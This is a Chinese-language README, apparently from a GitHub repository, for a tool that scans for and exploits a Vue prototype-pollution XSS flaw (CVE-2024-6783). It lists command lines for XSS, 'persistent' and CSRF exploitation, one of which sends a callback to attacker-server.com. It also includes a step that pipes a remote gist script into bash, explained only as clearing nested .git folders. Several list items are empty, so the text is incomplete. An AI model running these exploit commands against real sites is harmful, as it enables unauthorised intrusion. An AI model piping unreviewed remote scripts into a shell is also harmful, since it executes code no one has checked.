在 Vue 中发现了一个漏洞,该漏洞允许攻击者通过原型污染(prototype pollution)执行 XSS 攻击。攻击者可以修改某些属性的原型链,例如 Object.prototype.staticClass 或 Object.prototype.staticStyle,从而执行任意 JavaScript 代码。
通过 PayPal 或扫描下方二维码来支持本项目的维护。
请仅在安全且已获授权的环境中使用本项目,例如:
示例配置:
git clone https://github.com/HORKimhab/CVE-2024-6783
cd CVE-2024-6783
# 项目使用 Python,请按以下步骤操作
# 创建虚拟环境
python -m venv venv
# 激活虚拟环境
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# 安装依赖
pip install -r requirements.txt
示例用法:
# 仅扫描
python cve-2024-6783.py -u https://example.com -v
# 扫描并执行 XSS 漏洞利用
python cve-2024-6783.py -u https://example.com -e xss
# 带回调的 XSS 漏洞利用
python cve-2024-6783.py -u https://example.com -e xss -c http://attacker-server.com/callback
# 自动回调服务器
python cve-2024-6783.py -u https://example.com -e persistent -c auto
# CSRF 漏洞利用
python cve-2024-6783.py -u https://example.com -e csrf
# 完整扫描与漏洞利用(含详细输出)
python cve-2024-6783.py -u https://example.com -e xss -c auto -v -o evidence.html
注意:
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y 来清除嵌套目录中的 .git一个用于在受控环境中学习、测试和研究网络安全概念的仓库。
本仓库仅用于教育和已获授权的安全研究。
其设计目的是帮助用户了解:
请仅在您拥有许可的环境中使用本仓库,例如:
严禁未经授权或非法使用。
作者和贡献者不对因本项目造成的任何损害、滥用、法律问题或损失负责。
使用本仓库即表示您同意:
本项目旨在用于:
请遵循负责任披露实践,并遵守所有适用法律。
如需负责任披露或合作,请通过 GitHub 联系仓库维护者。